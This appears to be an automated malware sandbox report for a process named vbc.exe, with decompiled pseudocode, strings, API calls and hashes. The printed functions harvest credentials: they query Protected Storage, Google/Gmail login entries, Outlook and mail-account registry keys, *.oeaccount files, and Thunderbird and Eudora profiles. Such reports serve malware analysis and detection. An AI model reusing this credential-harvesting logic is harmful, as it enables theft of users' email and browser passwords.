Instruction ID: 2dce4414edd68d1824e6502eadb987a3f6dd3d23eecad8d1335d37cf0d0999a9
Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
Instruction Fuzzy Hash: B54182B0655642EFC3098F2AC5846C1FBE4BB09314F95C2AFD46C9B221C7B4A565CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00903021, Relevance: 6.3, Strings: 5, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00903021(intOrPtr* __esi) {
				void* __edi;
				intOrPtr* _t20;
				void* _t24;

				_t20 = __esi + 0x878;
				 *__esi = 0x412e98;
				 *((intOrPtr*)(__esi + 0x1c8)) = 0x412f1c;
				 *((intOrPtr*)(__esi + 0x1e0)) = 0x413760;
				 *((intOrPtr*)(__esi + 0x640)) = 0x412f24;
				 *((intOrPtr*)(__esi + 0x858)) = 0x412f2c;
				 *((intOrPtr*)(__esi + 0x86c)) = 0x412f30;
				 *((intOrPtr*)(__esi + 0x870)) = 0x412f34;
				 *_t20 = 0x412f38;
				E00903663(__esi + 0x890);
				 *((intOrPtr*)(__esi + 0x87c)) = 0x413bd8;
				E0090D71D(__esi + 0x87c);
				 *_t20 = 0x413144;
				 *((intOrPtr*)(__esi + 0x870)) = 0x4130f0;
				E00903663(__esi + 0x64c);
				E00902FE4(__esi + 0x1c8, _t24);
				return E0090744A(__esi);
			}

0x00903029
0x00903035
0x0090303b
0x00903041
0x0090304b
0x00903055
0x0090305f
0x00903069
0x00903073
0x00903079
0x00903084
0x0090308a
0x0090308f
0x0090309b
0x009030a5
0x009030aa
0x009030b8

Strings

4/A, xrefs: 00903069
,/A, xrefs: 00903055
0/A, xrefs: 0090305F
$/A, xrefs: 0090304B
`7A, xrefs: 00903041

Memory Dump Source

Source File: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000D.00000002.599319686.00000000008A0000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.599927792.0000000000922000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $/A$,/A$0/A$4/A$`7A
API String ID: 0-2435369464
Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
Instruction ID: 1dc81d5283734c58b7b7364fe792e41908331bd4c60c7ca8e01e101e2812a2f1
Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
Instruction Fuzzy Hash: A201F6B4000B45CEC721EF64C1856C6BBF4FB84305F10C90EE0AA8B204DBB8A29ADF59

Uniqueness

Uniqueness Score: -1.00%

Function 008C9829, Relevance: 5.2, Strings: 4, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E008C9829(intOrPtr _a4, signed char* _a8, intOrPtr _a12, char _a16, signed int* _a20) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				void* __edi;
				void* __esi;
				signed int _t66;
				void* _t70;
				intOrPtr _t71;
				signed int _t74;
				signed int _t84;
				void* _t85;
				signed int _t94;
				signed int* _t95;
				signed int _t96;
				signed int* _t97;
				signed char* _t100;
				signed int _t101;
				signed char _t104;
				signed char* _t136;
				intOrPtr _t140;

				_t136 = _a8;
				_v20 = 0;
				_v8 = 0;
				_v12 = 1;
				_v16 = 0x4435dc;
				if(_t136 != 0) {
					_t101 =  *_t136 & 0x000000ff;
					if(_t101 == 0x84) {
						_t101 = _t136[0x23] & 0x000000ff;
					}
					if(_t101 != 0x9c) {
						L8:
						if(_t101 == 0x5e || _t101 == 0x82 || _t101 == 0x81) {
							_t140 = _a4;
							_t66 = E008C980E(_t140);
							_v8 = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							if((_t136[2] & 0x00000400) == 0) {
								_push(_t136[4]);
								_t71 = E008BCE3A(0x44a3c8, _v16);
								_v20 = _t71;
								if(_t71 != 0) {
									_t129 = _v8;
									if(_v8 != 0) {
										E008C93C1(0x41315e, _t129, _t71, 1);
									}
									if(_t101 == 0x82) {
										 *((char*)(_v8 + 0x1e)) = 2;
									}
									L27:
									if(_t101 == 0x81 || _t101 == 0x82) {
										if(_a16 != 0x62) {
											goto L31;
										}
										_push(0x63);
										goto L32;
									} else {
										L31:
										_push(_a16);
										L32:
										E008CBE00(_v8);
										_t74 = _v8;
										if(( *(_t74 + 0x1c) & 0x0000000c) != 0) {
											 *(_t74 + 0x1c) =  *(_t74 + 0x1c) & 0x0000fffd;
										}
										goto L34;
									}
								}
								goto L22;
							}
							E008C9280(_v8, _t136[4] * _v12, _t136[4] * _v12 >> 0x20);
							goto L27;
						} else {
							if(_t101 != 0x9c) {
								if(_t101 != 0x83) {
									L36:
									 *_a20 = _v8;
									goto L37;
								}
								_t140 = _a4;
								_t84 = E008C980E(_t140);
								_v8 = _t84;
								if(_t84 == 0) {
									L22:
									 *((char*)(_t140 + 0x1e)) = 1;
									E008BC16B(_t140, _v20);
									E008C9A4C(_v8);
									 *_a20 =  *_a20 & 0x00000000;
									_t70 = 7;
									return _t70;
								}
								_t85 = E008BD157(_t136[4] + 2);
								asm("cdq");
								E008C93C1(0x41315e, _v8, E008BD801(_t140, 0x9c, _t136[4] + 2, _t85 - 1), 0);
								L17:
								L34:
								_t108 = _v8;
								if(_v8 != 0) {
									E008CBCAB(_t108);
								}
								goto L36;
							}
							L12:
							if(E008C9829(_a4, _t136[8], _a12, _a16,  &_v8) != 0) {
								goto L34;
							}
							E008C91BB(_v8);
							_t94 = _v8;
							_t95 = _t94 + 0x10;
							asm("adc edx, 0x0");
							 *_t95 =  ~( *_t95);
							_t95[1] =  ~( *(_t94 + 0x14));
							_t96 = _v8;
							_t97 = _t96 + 8;
							asm("adc edx, 0x0");
							 *_t97 =  ~( *_t97);
							_t97[1] =  ~( *(_t96 + 0xc));
							E008CBE00(_v8, _a16);
							goto L17;
						}
					}
					_t100 = _t136[8];
					_t104 =  *_t100;
					if(_t104 == 0x81 || _t104 == 0x82) {
						_v12 = _v12 | 0xffffffff;
						_t136 = _t100;
						_t101 =  *_t136 & 0x000000ff;
						_v16 = 0x44a3c4;
						goto L8;
					} else {
						goto L12;
					}
				} else {
					 *_a20 = 0;
					L37:
					return 0;
				}
			}

0x008c9834
0x008c9839
0x008c983c
0x008c983f
0x008c9846
0x008c984d
0x008c9859
0x008c9862
0x008c9864
0x008c9864
0x008c986f
0x008c9890
0x008c9893
0x008c996d
0x008c9970
0x008c9977
0x008c997a
0x00000000
0x00000000
0x008c9982
0x008c9998
0x008c99a3
0x008c99ad
0x008c99b0
0x008c99d4
0x008c99d9
0x008c99e6
0x008c99ec
0x008c99f3
0x008c99f8
0x008c99f8
0x008c99fc
0x008c9a02
0x008c9a10
0x00000000
0x00000000
0x008c9a12
0x00000000
0x008c9a16
0x008c9a16
0x008c9a16
0x008c9a19
0x008c9a1c
0x008c9a21
0x008c9a29
0x008c9a2b
0x008c9a2b
0x00000000
0x008c9a29
0x008c9a02
0x00000000
0x008c99b0
0x008c998f
0x00000000
0x008c98b1
0x008c98b3
0x008c991e
0x008c9a3d
0x008c9a43
0x00000000
0x008c9a43
0x008c9924
0x008c9927
0x008c992e
0x008c9931
0x008c99b2
0x008c99b5
0x008c99ba
0x008c99c4
0x008c99cc
0x008c99d1
0x00000000
0x008c99d1
0x008c993a
0x008c9944
0x008c9961
0x008c9967
0x008c9a31
0x008c9a31
0x008c9a36
0x008c9a38
0x008c9a38
0x00000000
0x008c9a36
0x008c98b5
0x008c98cf
0x00000000
0x00000000
0x008c98d8
0x008c98dd
0x008c98e3
0x008c98ed
0x008c98f0
0x008c98f4
0x008c98f7
0x008c98fd
0x008c9904
0x008c9909
0x008c990b
0x008c9911
0x00000000
0x008c9911
0x008c9893
0x008c9871
0x008c9874
0x008c9879
0x008c9880
0x008c9884
0x008c9886
0x008c9889
0x00000000
0x00000000
0x00000000
0x00000000
0x008c984f
0x008c9852
0x008c9a45
0x00000000
0x008c9a45

Strings

^1A, xrefs: 008C995A
^, xrefs: 008C9890
^1A, xrefs: 008C99DE
b, xrefs: 008C9A0C

Memory Dump Source

Source File: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000D.00000002.599319686.00000000008A0000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.599927792.0000000000922000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ^$^1A$^1A$b
API String ID: 0-1727528133
Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
Instruction ID: 1501ffb64b2c29b727dc44bc672e71b282ef3746d2799c668cdd334b21a28770
Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
Instruction Fuzzy Hash: AC61AD71A00204EBDB14CF68C889FADBBB5FF44310F2481ADE895EB292D735EE509B51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 1428 Parent PID: 4928 vbc.exeCOMMON

Executed Functions

Function 00403C3D, Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 170
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
				char _v8;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t38;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t60;
				char* _t73;
				void* _t76;
				_Unknown_base(*)()* _t86;
				void* _t87;
				void* _t89;
				signed int _t98;
				char* _t106;
				_Unknown_base(*)()* _t120;
				void* _t131;

				_t131 = __fp0;
				_t91 = __ecx;
				_push(__ecx);
				_t98 = __ecx;
				_t89 = __ecx + 0x87c;
				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
				E0040E894(_t89);
				_t38 = LoadLibraryA("pstorec.dll"); // executed
				 *(_t89 + 8) = _t38;
				if(_t38 == 0) {
					L4:
					E0040E894(_t89);
				} else {
					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
					_t120 = _t86;
					_t91 = 0 | _t120 != 0x00000000;
					 *(_t89 + 0x10) = _t86;
					if(_t120 != 0) {
						goto L4;
					} else {
						_t91 = _t89 + 4;
						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
						_t122 = _t87;
						if(_t87 != 0) {
							goto L4;
						} else {
							 *(_t89 + 0xc) = 1;
						}
					}
				}
				E004047A0(_t98 + 0x890, _t122);
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
				_push(_t98 + 0x858); // executed
				E0040754D(_t91, _t122); // executed
				E0040719C(_t91, _t98 + 0x86c); // executed
				E0040765B(_t122, _t98 + 0x878); // executed
				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
				_t123 = _t52;
				if(_t52 == 0) {
					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
				}
				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
				_t124 = _t54;
				if(_t54 == 0) {
					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
				}
				E00402C44(_t91, _t131, _t98); // executed
				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
				_t56 = E00406278();
				_push( &_v8);
				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
				} else {
					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
				}
				_push(0x80000001);
				_t58 = E0040EB3F();
				_t126 = _t58;
				if(_t58 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t126, _t131, _t98);
				}
				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
				_t127 = _t60;
				if(_t60 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t127, _t131, _t98);
				}
				E0040E8AB(_t89);
				E004047F1(_t98 + 0x890);
				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
				E0040329E(_t131, _t98);
				E004034CB(_t91, _t127, _t131, _t98); // executed
				E0040396C(_t127, _t131, _t98); // executed
				E004037B1(_t91, _t98, _t131, _t98); // executed
				_t73 = _t98 + 0xb20;
				_t128 =  *_t73;
				if( *_t73 != 0) {
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
				}
				_t106 = _t98 + 0xc25;
				_t129 =  *_t106;
				if( *_t106 != 0) {
					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
				}
				_push(_t98 + 0x640); // executed
				E0040D9F9(_t129); // executed
				E0040D865(_t98 + 0x640);
				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
				return _t76;
			}

0x00403c3d
0x00403c3d
0x00403c40
0x00403c44
0x00403c46
0x00403c4c
0x00403c52
0x00403c5c
0x00403c66
0x00403c69
0x00403c9b
0x00403c9d
0x00403c6b
0x00403c71
0x00403c79
0x00403c7b
0x00403c7e
0x00403c83
0x00000000
0x00403c85
0x00403c88
0x00403c8c
0x00403c8e
0x00403c90
0x00000000
0x00403c92
0x00403c92
0x00403c92
0x00403c90
0x00403c83
0x00403ca8
0x00403cb2
0x00403cbc
0x00403cc6
0x00403cd0
0x00403cdb
0x00403cdc
0x00403ce8
0x00403cf4
0x00403d07
0x00403d0f
0x00403d11
0x00403d19
0x00403d19
0x00403d2c
0x00403d34
0x00403d36
0x00403d3e
0x00403d3e
0x00403d44
0x00403d49
0x00403d53
0x00403d5f
0x00403d60
0x00403d69
0x00403d62
0x00403d62
0x00403d62
0x00403d6e
0x00403d73
0x00403d7b
0x00403d7d
0x00403d8a
0x00403d7f
0x00403d83
0x00403d83
0x00403d9f
0x00403da9
0x00403db1
0x00403db3
0x00403dc0
0x00403db5
0x00403db9
0x00403db9
0x00403dc9
0x00403dd4
0x00403de0
0x00403dec
0x00403df2
0x00403df8
0x00403dfe
0x00403e04
0x00403e09
0x00403e0f
0x00403e12
0x00403e1d
0x00403e27
0x00403e27
0x00403e2c
0x00403e32
0x00403e35
0x00403e45
0x00403e55
0x00403e5f
0x00403e5f
0x00403e6a
0x00403e6b
0x00403e71
0x00403e7d
0x00403e86

APIs

Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0

LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
strcpy.MSVCRT(?,?), ref: 00403E45

Strings

www.google.com/Please log in to your Google Account, xrefs: 00403CC1
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
pstorec.dll, xrefs: 00403C57
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
PStoreCreateInstance, xrefs: 00403C6B
www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Library$AddressFreeLoadProcstrcpy
String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
API String ID: 2884822230-961845771
Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406EC3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406EC3(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E00406F5B(_t40);
						goto L4;
					}
				} else {
					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t38 =  &(_t40[0xa2]);
						_t28 =  &(_t40[0x5d]);
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E004062AD(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}

0x00406ec5
0x00406ec7
0x00406ecc
0x00406ef7
0x00406eff
0x00406f03
0x00000000
0x00406f05
0x00406f05
0x00000000
0x00406f05
0x00406ece
0x00406ed9
0x00406ee7
0x00406ee9
0x00406f0a
0x00406f0f
0x00406f11
0x00406f14
0x00406f1a
0x00406f20
0x00406f27
0x00406f3f
0x00406f4e
0x00406f41
0x00406f45
0x00406f4b
0x00406f53
0x00406f0f
0x00406f5a

APIs

FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
strlen.MSVCRT ref: 00406F27
strlen.MSVCRT ref: 00406F2F

Strings

rA, xrefs: 00406F12

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFindstrlen$FirstNext
String ID: rA
API String ID: 379999529-474049127
Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED0B, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceA(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								 *0x417110 =  *0x417110 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

0x0040ed18
0x0040ed1e
0x0040ed22
0x0040ed2f
0x0040ed33
0x0040ed39
0x0040ed41
0x0040ed44
0x0040ed4c
0x0040ed50
0x0040ed53
0x0040ed56
0x0040ed58
0x0040ed58
0x0040ed5c
0x0040ed5f
0x0040ed6f
0x0040ed71
0x0040ed75
0x0040ed75
0x0040ed79
0x0040ed83
0x0040ed83
0x0040ed4c
0x0040ed41
0x0040ed88
0x0040ed8e

APIs

FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
LoadResource.KERNEL32(?,00000000), ref: 0040ED39
LockResource.KERNEL32(00000000), ref: 0040ED44

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688

Uniqueness

Uniqueness Score: -1.00%

Function 00401E8B, Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00401E8B(void* __eflags, char* _a4) {
				signed int _v8;
				int _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void _v1059;
				char _v1060;
				void _v1323;
				char _v1324;
				void _v2347;
				char _v2348;
				void* __edi;
				void* __esi;
				int _t65;
				char* _t69;
				char _t70;
				int _t71;
				char _t75;
				void* _t76;
				long _t78;
				void* _t83;
				int _t85;
				void* _t87;
				int _t104;
				int _t108;
				char _t126;
				void* _t137;
				void* _t139;
				char* _t157;
				char* _t158;
				char* _t160;
				int _t161;
				void* _t164;
				CHAR* _t169;
				char* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_v540 = 0;
				memset( &_v539, 0, 0x104);
				_t164 = 0x1a;
				E0040EE59( &_v540, _t164); // executed
				_t65 = strlen("Mozilla\\Profiles");
				_t6 = strlen( &_v540) + 1; // 0x1
				_t172 = _t171 + 0x14;
				if(_t65 + _t6 >= 0x104) {
					_t69 = _a4;
					 *_t69 = 0;
					_t157 = _t69;
				} else {
					_t157 = _a4;
					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
				}
				_t70 = E0040614B(_t157);
				if(_t70 == 0) {
					 *_t157 = _t70;
				}
				_t158 = _t157 + 0x105;
				_t71 = strlen("Thunderbird\\Profiles");
				_t12 = strlen( &_v540) + 1; // 0x1
				if(_t71 + _t12 >= 0x104) {
					 *_t158 = 0;
				} else {
					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
				}
				_t75 = E0040614B(_t158);
				_pop(_t137);
				if(_t75 == 0) {
					 *_t158 = _t75;
				}
				_t160 = _a4 + 0x20a;
				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
				_t173 = _t172 + 0xc;
				if(_t76 == 0) {
					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
					_t173 = _t173 + 0xc;
					if(_t126 == 0) {
						 *_t160 = _t126;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
				_t174 = _t173 + 0xc;
				if(_t78 != 0) {
					L32:
					_t169 = _a4 + 0x30f;
					if( *_t169 != 0) {
						L35:
						return _t78;
					}
					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
					_t78 = E0040614B(_t169);
					if(_t78 != 0) {
						goto L35;
					}
					 *_t169 = _t78;
					return _t78;
				} else {
					_v796 = _t78;
					_t161 = 0;
					memset( &_v795, 0, 0xff);
					_v12 = 0;
					_t83 = E0040EC05(_v8, 0,  &_v796);
					_t175 = _t174 + 0x18;
					if(_t83 != 0) {
						L31:
						_t78 = RegCloseKey(_v8);
						goto L32;
					}
					_t170 = "sqlite3.dll";
					do {
						_t85 = atoi( &_v796);
						_pop(_t139);
						if(_t85 < 3) {
							goto L28;
						}
						_v2348 = 0;
						memset( &_v2347, _t161, 0x3ff);
						_v276 = 0;
						memset( &_v275, _t161, 0x104);
						sprintf( &_v2348, "%s\\Main",  &_v796);
						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
						_t175 = _t175 + 0x38;
						if(_v276 != 0 && E0040614B( &_v276) != 0) {
							_v1060 = 0;
							memset( &_v1059, _t161, 0x104);
							_v1324 = 0;
							memset( &_v1323, _t161, 0x104);
							_t104 = strlen(_t170);
							_t41 = strlen( &_v276) + 1; // 0x1
							_t175 = _t175 + 0x20;
							if(_t104 + _t41 >= 0x104) {
								_v1060 = 0;
							} else {
								E004062AD( &_v1060,  &_v276, _t170);
							}
							_t108 = strlen("nss3.dll");
							_t47 = strlen( &_v276) + 1; // 0x1
							if(_t108 + _t47 >= 0x104) {
								_v1324 = 0;
							} else {
								E004062AD( &_v1324,  &_v276, "nss3.dll");
							}
							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
								_t161 = 0;
								goto L28;
							} else {
								strcpy(_a4 + 0x30f,  &_v276);
								goto L31;
							}
						}
						L28:
						_v12 = _v12 + 1;
						_t87 = E0040EC05(_v8, _v12,  &_v796);
						_t175 = _t175 + 0xc;
					} while (_t87 == 0);
					goto L31;
				}
			}

0x00401ea6
0x00401ead
0x00401eb4
0x00401ebb
0x00401ec6
0x00401ed9
0x00401edd
0x00401ee2
0x00401efa
0x00401efd
0x00401f00
0x00401ee4
0x00401ee4
0x00401ef1
0x00401ef7
0x00401f03
0x00401f0b
0x00401f0d
0x00401f0d
0x00401f14
0x00401f1a
0x00401f2d
0x00401f35
0x00401f4e
0x00401f37
0x00401f45
0x00401f4b
0x00401f52
0x00401f59
0x00401f5a
0x00401f5c
0x00401f5c
0x00401f6b
0x00401f76
0x00401f7b
0x00401f85
0x00401f92
0x00401f97
0x00401f9c
0x00401f9e
0x00401f9e
0x00401f9c
0x00401fa0
0x00401fae
0x00401fb3
0x00401fb8
0x004021a9
0x004021ac
0x004021b5
0x004021d5
0x004021d5
0x004021d5
0x004021be
0x004021c5
0x004021cd
0x00000000
0x00000000
0x004021cf
0x00000000
0x00401fbe
0x00401fc3
0x00401fc9
0x00401fd3
0x00401fe3
0x00401fe6
0x00401feb
0x00401ff0
0x004021a0
0x004021a3
0x00000000
0x004021a3
0x00401ff6
0x00401ffb
0x00402002
0x0040200a
0x0040200b
0x00000000
0x00000000
0x0040201e
0x00402025
0x00402033
0x0040203a
0x00402052
0x0040206e
0x00402073
0x0040207d
0x004020a1
0x004020a8
0x004020b6
0x004020bd
0x004020c3
0x004020d6
0x004020da
0x004020df
0x004020f8
0x004020e1
0x004020ef
0x004020f5
0x00402104
0x00402117
0x0040211f
0x0040213c
0x00402121
0x00402133
0x00402139
0x00402152
0x00402165
0x00000000
0x00402189
0x00402199
0x00000000
0x0040219f
0x00402152
0x00402167
0x00402167
0x00402177
0x0040217c
0x0040217f
0x00000000
0x00402187

APIs

memset.MSVCRT ref: 00401EAD
strlen.MSVCRT ref: 00401EC6
strlen.MSVCRT ref: 00401ED4
strlen.MSVCRT ref: 00401F1A
strlen.MSVCRT ref: 00401F28
memset.MSVCRT ref: 00401FD3
atoi.MSVCRT ref: 00402002
memset.MSVCRT ref: 00402025
sprintf.MSVCRT ref: 00402052

Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA

memset.MSVCRT ref: 004020A8
memset.MSVCRT ref: 004020BD
strlen.MSVCRT ref: 004020C3
strlen.MSVCRT ref: 004020D1
strlen.MSVCRT ref: 00402104
strlen.MSVCRT ref: 00402112
memset.MSVCRT ref: 0040203A

